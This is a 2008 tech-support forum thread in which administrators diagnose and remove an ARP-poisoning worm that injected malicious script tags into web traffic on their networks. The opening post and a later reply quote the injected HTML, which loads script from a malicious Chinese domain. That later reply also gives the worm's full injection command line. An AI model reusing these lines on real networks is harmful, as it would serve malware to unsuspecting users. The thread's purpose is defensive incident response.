Solved

Fast Spreading infection, Unknown to all Virus, Spyware, Malware Cleaners

Posted on 2008-06-21
35
928 Views
Last Modified: 2013-11-22
We have an environment that quickly had a "Malware" infection.  Sympton is Internet Explorer Tab reads: "Fuck Th3 W0rld!" and it is injected into the source code of every Java enabled Website.  We cannot clean nor find the source of the spreading.  Here is the Java Source:  <script language="JavaScript" src="http://nb88.cn/search/vip.js"></script><title>**** Th3 W0rld!</title> <HTML>

I also have Hijack this from these if needed.
0
Comment
Question by:RTPIT
  • 9
  • 8
  • 6
  • +6
35 Comments
 

Author Comment

by:RTPIT
Comment Utility
Do not Click the Link above as it is points to known Infected Domain
0
 

Author Comment

by:RTPIT
Comment Utility
We have found that all machines connected (20ish) to the network with the exception of 1 is experiencing the issue.  No other issues are being reported or found during investigation.
0
 
LVL 1

Expert Comment

by:adds21
Comment Utility
We are also getting this on a number of networked machines.  Anyone have any ideas?  Thanks.
0
 
LVL 31

Expert Comment

by:moorhouselondon
Comment Utility
This site identifies the problem, and elsewhere on the site suggests possible solutions

http://malwaredomains.com/?p=223
0
 

Expert Comment

by:blueswitch
Comment Utility
i have the same problem
any body have any ideas
0
 
LVL 31

Expert Comment

by:moorhouselondon
Comment Utility
A temporary fix can be had by creating an entry for nb88.cn in your Hosts file, and redirecting it to 127.0.0.1

http://www.mvps.org/winhelp2002/hosts.htm
0
 

Expert Comment

by:blueswitch
Comment Utility
i have not been able to detect this with anyhing

what is happening
what server is infected is it web sql
and where

thanks
0
 

Expert Comment

by:blueswitch
Comment Utility
my problem is on my web servers
its broadcasting the message to  the world
that fix does not work on a server
0
 
LVL 31

Expert Comment

by:moorhouselondon
Comment Utility
That is true - but please bear in mind that this is someone else's question!  ;-))

What I suggest is that you post a new question into a more appropriate zone (server based, rather than client based), and I'm sure nobody would mind you linking the two questions together by posting cross references.  

Otherwise people reading this are going to get confused!
0
 

Expert Comment

by:blueswitch
Comment Utility
i posted the question under the security/ misc group.
0
 
LVL 31

Expert Comment

by:moorhouselondon
Comment Utility
0
 
LVL 1

Expert Comment

by:adds21
Comment Utility
I've copied this from my answer at http://www.experts-exchange.com/Security/Misc/Q_23505410.html, in case it's of use:

Okay.  We've now fixed out problem.

Firstly, it would appear there is nothing running on the webservers themselves.  It looks to me like a process running on the SQL Server is affecting the IIS machines (maybe via DCOM?).  

In our case, we found that rebooting the SQL Server machine *and not logging onto it* fixed the problem.  As soon as someone logged onto the machine either via TS, or on the console, the problem came back.

So, we looked at the /run regkey in, and sure enough it was running an unknown process at user login - I'm sorry, I can't remember what the process was called (just wanted to delete it!), but that has now fixed our problem.

Of course, we also had a number of other nasties on the SQL server which need to be sorted, but at least we have a little more time to fix that.

So, I would recommend looking very closely at your SQL servers.  Turn them off if necessary and see if the problem goes away on the web servers.  If it does, at least you know where to look.

It's been a long night!
0
 

Author Comment

by:RTPIT
Comment Utility
Thanks Adds21 we are working through our multiple SQL servers right now to find the culprit/culprits.
0
 

Expert Comment

by:alfiomar
Comment Utility
I have the same problem but not installed sql on the infected server. All sites on these machine has the same problem, asp pages or html pages. I think is corrupted iis. Thanks for help
0
 

Expert Comment

by:yfactor
Comment Utility
I have the same issue with one of our servers. Does anyone else know what the process was called.
Our server application only uses paramertized stored procedures for accessing the database I don't see how it could have been vulnerable to an injection attack.
0
 

Expert Comment

by:blueswitch
Comment Utility
see here

http://www.experts-exchange.com/Security/Misc/Q_23505410.html

it was my post, the infection is on sql, check all teh sql server and check the run regkey, you will see a process, kill it under task manager and remove from startup you will be ok

tehn use teh windows malicious software tool to scan them all and remove
0
 

Expert Comment

by:yfactor
Comment Utility
Granted I'm no security expert - I don't even know what to look for when you say "check the run regkey" but I haven't been able to see any evidence of a hack. I've scanned the system with AVG and found nothing. The server in question is a stand-alone with no other machines on the domain (and no trusts) and I have only had reports of the offense page title coming from one network (the owners of the server we're managing). Is it possble that the worm could just be on their internal network and not on the Web server?
0
Enabling OSINT in Activity Based Intelligence

Activity based intelligence (ABI) requires access to all available sources of data. Recorded Future allows analysts to observe structured data on the open, deep, and dark web.

 

Expert Comment

by:ChiliMatt
Comment Utility
I am working with a client who as the same issue.  Also with this issue is an inability to browse the web on some machines.  There are no MS SQL servers but there is the smaller engine as wel.  Please Help.
0
 

Author Comment

by:RTPIT
Comment Utility
Chili-  We are in the process of narrowing it down currently.  It seems that any SQL engine is vulnerable.  How large is your network?
0
 

Expert Comment

by:ChiliMatt
Comment Utility
RTPIT

The network is about 50 pcs.  about 10 are running the free version of MS SQL.  But no full blown SQL servers on the network.  Has anyone disovered the process to look for or any virus scanner or malware scanner which detects this PITA?  What is wierd is on the machines that cannot connect to the internet they cannot ping the gateway address.  But they have access to all the internal applications and servers.  The arp table sometimes shows the mac address as all 0 and shows it as invalid.  Wireshark doesn't seem to show anything unusual from one of these machines either.  Although I am not real sure what to look for.  Any help would be appreciated.

Thanks!
0
 

Author Comment

by:RTPIT
Comment Utility
We haven't found any processes running on the servers.  I have scowwered them with a fine tooth comb.  Just to make this more frustrating if we install a wireless card into one of the "infected" machines and connect to our seperate guest network the problem disappears.  The best we can tell this initial PITA is meant to download the real trouble but Symantec is blocking it.  I used Wire Shark, IPView from MS the former Sysinternals software, and a few open source utilities and nothing.  I talked with our sister company an ISP and they had me try a simple netstat -an to see what ports each machine are listening on.  This didn't give me any answers just more shots in the dark.
0
 

Expert Comment

by:ChiliMatt
Comment Utility
RTPIT

Yep same thing here we did the netstat right away but haven't found anything.  If we could at least locate which pc was causing the issue I might be able to get a clue but this is really getting frustrating.  We even thought maybe our router was compromised and put in a new router.  The only clue we found was that if we spoofed a mac address of a working machine on an "infected" machine then we could get out.  So whatever is causing this is working at the mac address level.  Nothing is showing up on wireshark or any packet sniffer that looks odd to me or any of my staff.  I have suggested to shut every machine on the network down and bring them back up one by one testing each one as it come up to see if it causes the issues.

Also we have the same issue with wireless that you do.  If we put a wireless card in a pc it is fine.  Most likely because the mac address of the access point is okay for some reason.  I just don't know why or how this is possible.
0
 

Author Comment

by:RTPIT
Comment Utility
Chili,

Do you have any machines that are not experiencing the issue?  We have a small handful of machines that are chugging along unaffected.  I have compared them at great lengths, but I haven't found anything that makes one vulnerable and one not.  If you have any ideas, feel free to bounce them off of us.  The environments we are in are very similar.  
0
 

Expert Comment

by:ChiliMatt
Comment Utility
RTPIT

We have some machines like yours that seem unaffected they can browse the web just fine but they still have F*** th3 W0rld!  injected in the headers of thier webpages.  BTW changing the router has not helped us out at all either.  
0
 

Expert Comment

by:blueswitch
Comment Utility
all machines on your internal network wil appear unaffected, thats the confusing part about this infection, its an arp attack, it changes teh default gateway of the network to the infected machine via arp.

simple way to confirm this thi stake one of you infected machines and change the ip, it will look clean again.

ther is one machine on the network with the arp process running, kill that, and all will be corrected
0
 

Author Comment

by:RTPIT
Comment Utility
Bluswitch-  Any ideas what the ARP process is?
0
 

Accepted Solution

by:
stephenevans earned 400 total points
Comment Utility
I've Sorted this one,  follow my link below to another post,

http://www.experts-exchange.com/Security/Misc/Q_23505410.html

You will find DLL's in your windows\system32 called:

<System>\drivers\npf.sys
<System>\packet.dll
<System>\wpcap.dll

Along with an EXE.  Those DLL's are network level packet drivers, they give EXE on the server the ability to listen and reply to all network trafic on the LAN regardless if it's desinted for the infected server or not.  If you find any of the files above search for all file created on that same day.

You will also notice that the server that is infecred will have higher that normal traffic though the network card as it's messing with the ARP entries on your lan, thats how it injects the "**** th3 w0rld!" title in web pages as those pages are first traversing though the infected server.

St
0
 

Expert Comment

by:blueswitch
Comment Utility
sorry, but when i saw the infection, i delted so quickly that i didnt write down what it was
0
 

Expert Comment

by:stephenevans
Comment Utility
Im my case there was an .exe created at the same time as the DLL's and that was called wapsrv.exe.
0
 

Expert Comment

by:blueswitch
Comment Utility
that sounds familiar, this was an incredible attack, it tooks hours before we realized what it was, and originally thought all machines were infected
0
 

Author Comment

by:RTPIT
Comment Utility
I found the culprit I made 2 scripts one for 2000 and one for XP/Server

2000.bat
del c:\WINNT\system32\packet.dll
del c:\WINNT\system32\wanpacket.dll
del c:\WINNT\system32\wapsrv.exe
del c:\WINNT\system32\wpcap.dll
del c:\WINNT\system32\drivers\npf.sys
pause

XP/Server
del c:\windows\system32\packet.dll
del c:\windows\system32\wanpacket.dll
del c:\windows\system32\wapsrv.exe
del c:\windows\system32\wpcap.dll
del c:\windows\system32\drivers\npf.sys
pause

These batches did find some files and delete them but eventually I found one machine with access denied on the deletion.  After looking over the processes there was only one process svhost.exe process run by the local user account, it's switch was:

C:\WINDOWS\system32\svchost.exe -idx 0 -ip 192.168.5.1-192.168.5.255 -port 80 -insert "<script language="""JavaScript""" src="""http://nb88.cn/search/vip.js"""></script><title>Fuck Th3 W0rld!</title>"

Thanks again stephenevans
0
 

Author Comment

by:RTPIT
Comment Utility
svchost.exe was being run from c:\windows\system32\waptimes.exe

Triggered from HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
0
 

Expert Comment

by:ChiliMatt
Comment Utility
Yep we found the same thing RTPIT.  Our client is so freaked that they requested we wipe the machine for them and reload everything.  
0
 

Expert Comment

by:ChiliMatt
Comment Utility
Just another head's up the program we found was called arpinsert.exe triggered from

HKEY_LOCAL_Machine\Software\Microsoft\Windows\CurrentVersion\Run

So there maybe more variants of this nasty going around.
0
 
LVL 23

Assisted Solution

by:Admin3k
Admin3k earned 100 total points
Comment Utility
I saw this the other day .

there is a machine on the network that is infected by a variant of W32.ARPIFRAME worm

http://www.symantec.com/security_response/writeup.jsp?docid=2007-061222-0609-99


this is the original Culprit, a Low profile worm that uses WINPCAP library to inject  malicious HTML code into HTTP traffic accross a switched network , using ARP poisoning attacks , the IFrames injected differ, but the payload is usually executing  JS / VBS trojan downloaders , Mcafee detects it as Trojan VBS/ PSYME , Kaspersky detects it as Trojan-Downloader.JS.Multi.cn

the trojan downloaders also use an unpatched vulnerability for internet explorer to auto download from a list of chinese sites & execute stealthily further malware.

among the malware that was downloaded are several Password stealer trojan , as well as an extremely nasty piece of malware (W32.Almanahe.C) , which is a hybrid PE infector virus/Worm/trojan/rootkit .


Microsoft has released an advisory / temp fix which is to disable The Disable ADODB.Stream object from Internet Explorer

http://channel9.msdn.com/forums/Coffeehouse/11599-Official-Microsoft-security-fix-for-IE-vulnerability-ADODBStream/

hope this helps.




try running a protocol analyzer on your network , identify machines that are actively braodcasting / spoofing as the network gateway OR , intercept any traffic with the above text filter / URL.

once you have cleaned up all the  from the ARPIFRAME infection machines,


0

Featured Post

How to run any project with ease

Manage projects of all sizes how you want. Great for personal to-do lists, project milestones, team priorities and launch plans.
- Combine task lists, docs, spreadsheets, and chat in one
- View and edit from mobile/offline
- Cut down on emails

Join & Write a Comment

Suggested Solutions

Title # Comments Views Activity
Crypto Ransomware 9 99
Virus softwares 11 64
Yet another Ransome ware 13 143
Ransomware 9 57
HOW TO REMOTELY CLEAN MEROND.O WITH ESET SILENTLY PROBLEM       If you have the fortunate luck to contract the Merond.O virus on your network, it can be quite troublesome to remove as it propagates to network shares on your network. In my case, the …
Many people tend to confuse the function of a virus with the one of adware, this misunderstanding of the basic of what each software is and how it operates causes users and organizations to take the wrong security measures that would protect them ag…
It is a freely distributed piece of software for such tasks as photo retouching, image composition and image authoring. It works on many operating systems, in many languages.
You have products, that come in variants and want to set different prices for them? Watch this micro tutorial that describes how to configure prices for Magento super attributes. Assigning simple products to configurable: We assigned simple products…

728 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

9 Experts available now in Live!

Get 1:1 Help Now